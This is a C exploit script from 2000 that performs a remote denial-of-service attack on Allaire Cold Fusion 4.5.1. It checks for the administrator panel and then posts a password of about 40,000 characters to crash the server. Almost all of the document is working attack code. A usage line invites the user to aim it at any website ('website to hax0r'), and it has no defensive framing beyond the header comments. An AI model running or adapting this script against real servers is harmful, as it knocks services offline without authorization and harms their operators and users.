Cold Fusion 4.5.1 remote dos attack - sends a very long password, crashing the server.
0b5a9e596dbd2833a0b03573a26e83f6d337941402dc05d7f9f0a61b76ea5f58
/* [yl-cfDoS.c]
title: [cold fusion 4.5.1 ereeu DoS attack]
date: 06.11.2000
author: ytcracker[phed@felons.org]
comments: allaire[www.allaire.com]'s cold fusion webserver seemingly
has an odd little bug in it where it suffers from a denial
of service attack when the administrator panel is accessed
using a character post of greater than 4o,ooo characters.
if your password is 4o,ooo or more characters, i suggest
that you change your password immediately.
usage: ./yl-cfDoS [website to hax0r]
shouts: seven one nine. master p and the no limit army. geese.
credit: foundstone for the buqtraq advisory.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/param.h>
int main(int argc, char **argv)
{
int sock;
unsigned long vulnip;
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
char *detect;
char buffer[1024];
char cfhack[]="POST /cfide/administrator/index.cfm HTTP/1.0\n\nReferer: http://www.csanetworks.com\nUser-Agent: ytCracker vo.1 (ytCLinux 5.o)\n";
char cfchars[40001];
char cfdos[40050];
printf("\n [cf 4.5.1 DoS] [ytcracker] [phed@felons.org]\n");
if(argc<2)
{
printf(" usage: %s [vulnerable website]\n\n",argv[0]);
exit(0);
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
vulnip=inet_addr(argv[1]);
vulnip=ntohl(vulnip);
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
send(sock, cfhack,strlen(cfhack),0);
recv(sock, buffer, sizeof(buffer),0);
detect = strstr(buffer,"404");
close(sock);
if( detect != NULL)
{
printf(" vulnerabilty not detected.\n\n");
exit(0);
}
else
printf(" vulnerability detected.\n");
printf(" sending crash data.\n");
memset(cfchars,89,sizeof(cfchars));
sprintf(cfdos,"%s\nPasswordProvided=%s\n\n\n",cfhack,cfchars);
vulnip=inet_addr(argv[1]);
vulnip=ntohl(vulnip);
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
send(sock,cfdos,strlen(cfdos),0);
close(sock);
printf(" data sent!\n\n");
return 0;
}